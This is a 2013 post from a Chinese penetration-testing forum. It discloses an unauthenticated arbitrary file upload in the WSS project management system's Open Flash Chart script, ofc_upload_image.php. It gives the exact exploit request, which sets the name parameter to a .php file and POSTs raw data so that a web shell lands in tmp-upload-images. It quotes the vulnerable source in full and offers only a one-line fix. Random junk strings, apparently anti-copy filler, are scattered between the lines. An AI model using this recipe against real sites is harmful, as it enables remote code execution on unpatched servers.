中国网络渗透测试联盟
标题:
WSS项目管理系统Post get shell
[打印本页]
作者:
admin
时间:
2013-2-23 12:38
标题:
WSS项目管理系统Post get shell
POST 数据漏洞文件执行任意后缀文件保存
/ U& ^9 J. R3 _2 j) I% G
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
v( P6 H( z7 a3 [! \* D
8 b6 Y+ D* u4 J5 n0 I5 h4 _6 }
利用:
, c8 A2 k. e$ P& O2 R% R
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
; x3 l" A9 ^4 _+ t" l
( f- H& {" t" x/ l% o) n
Post任意数据
- l. O" p( L4 i( X* C# [1 _$ h, y
保存位置http://localhost/chart/tmp-upload-images/hfy.php
! _7 v' W# B7 b. n! Q4 y
[attach]201[/attach]
w) o/ A a T) k. M% P+ S; g
[attach]202[/attach]
0 E: \, B* m' A" q/ f
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
0 h: ~# F- D& x _( y' `' l f
5 \4 j5 e! I( d; r' b
<?php
: S; n( p" w7 C9 h
: H+ U' t9 R4 k6 T7 q
//
+ q3 D5 D* N$ Y3 x
// In Open Flash Chart -> save_image debug mode, you
5 H1 q6 q) k7 z( ?1 y
// will see the 'echo' text in a new window.
+ ?) m) d `, S0 P
//
7 X6 I4 e1 |, W. T
+ M/ C* i# t Y4 c
/*
, T3 \$ J) U$ |; a
. E0 o$ [7 d5 @6 ]
print_r( $_GET );
( c/ d7 o! W7 M0 P# {/ z
print_r( $_POST );
7 [! ^1 i' L: F* f/ y+ L. A& o
print_r( $_FILES );
! R( y5 D4 r3 T
: e4 N! o$ p8 C# q6 \2 E
print_r( $GLOBALS );
/ g, i( V. P; a, y
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
+ d8 [, @( {4 J
) n4 E/ _1 k9 L' m9 q" l
*/
* X. {7 L! I5 e6 l! l7 Q
// default path for the image to be stored //
/ f3 s9 g+ q- ]1 C. B# `: Q& l5 ?
$default_path = '../tmp-upload-images/';
) x2 r& u- U+ K1 ~3 X: x
; ?& _9 }8 n/ T" w
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
4 r+ t4 H+ U7 k) u5 P; u. M
! R+ K. n& C/ |
// full path to the saved image including filename //
, @& K# y0 v# O9 | `
$destination = $default_path . basename( $_GET[ 'name' ] );
0 p% ]; \- i7 N0 T! ?9 s! b) D% D m
- K6 r8 `& p! r) y2 N# u8 ?" ~
echo 'Saving your image to: '. $destination;
5 F& R& M& `2 G+ o6 |
// print_r( $_POST );
* M8 A2 @; Q) T! I5 G
// print_r( $_SERVER );
) U7 |7 c9 r! d8 K: C, H/ A
// echo $HTTP_RAW_POST_DATA;
6 I2 I! p3 ?- R0 u2 `
. _0 H0 Z9 N6 i; P1 E" q. Z
//
( ?" M% x2 H+ O1 ]: H6 ?
// POST data is usually string data, but we are passing a RAW .png
8 j$ u/ @4 G N7 q
// so PHP is a bit confused and $_POST is empty. But it has saved
; v" l8 @% U: }& F' `
// the raw bits into $HTTP_RAW_POST_DATA
% c3 u4 z: H- k! @0 ~ l
//
! F- c; v' s8 E/ Z V& s
# H' e0 J4 z2 D
$jfh = fopen($destination, 'w') or die("can't open file");
2 N& H: F4 g+ [2 R! g Y- s4 Z( t
fwrite($jfh, $HTTP_RAW_POST_DATA);
" U4 H: D- `" _0 R
fclose($jfh);
/ I. y# y7 v2 J4 s9 c4 e
! r, j0 a" l0 e
//
3 J* D' q- Z* _) Z/ V) T2 a& `
// LOOK:
3 }+ O& j. C. u0 D1 p7 C3 q: Z
//
4 m* f: h( Z' G7 b! m5 i
exit();
% e' u3 ~ A, n1 ]- Q* r ]: N( Z! i# b
//
# t& p% d" t5 z3 B: w) c# B
// PHP5:
: V5 r0 b% e) N
//
+ _+ a. Z: ?- v8 }: m
9 K& G5 a" w) \2 H
: [* A. u! I& y! ~! M
// default path for the image to be stored //
) J8 ?- T& w1 `6 h# w
$default_path = 'tmp-upload-images/';
j$ v' H. }7 M0 `, ]) E3 |
5 R5 m! y0 n) Q( z
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
9 L) v$ i0 t; V; P, i$ Z' N
, D& X+ p- A1 Z4 ~! B
// full path to the saved image including filename //
$ N- T4 T5 ]* O5 O
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
/ b* T3 R2 d) y" T8 J2 w' h
' _ c) i5 g. Q8 l! e& G2 T
// move the image into the specified directory //
$ u9 M7 Y. G1 ~7 \- {
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
; }. ?8 d" T- v. d
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
' U" Z% |2 |) Y. K
} else {
4 i& X4 {. V( r) h
echo "FILE UPLOAD FAILED";
- }! I' F2 _' j
}
* h" o# u6 x+ \) a# f! _
0 x9 r1 M5 ^4 l! S6 a
, ]5 n, E* D z' b
?>
) O7 ?# \ ]( X) n+ e
7 I) @- q k" i- _& a
5 I! Q7 ]! ^$ p
h* y' Y+ L1 ?% _* a
/ E4 e* h' ~4 y. U/ D
[attach]203[/attach]
3 s0 p7 q$ y2 ~% ]
" j! \' `3 O" [" o6 u$ P/ i
修复方案:
5 Y4 A; A! ^$ U9 \
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
5 P4 x4 q/ N$ d2 l) h6 s( i
6 V3 C6 Z6 h$ @/ V, y
, ^/ W0 v* P G5 [( t
- H4 u* l2 | n1 _2 K
/ p: c% `9 }/ a$ n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2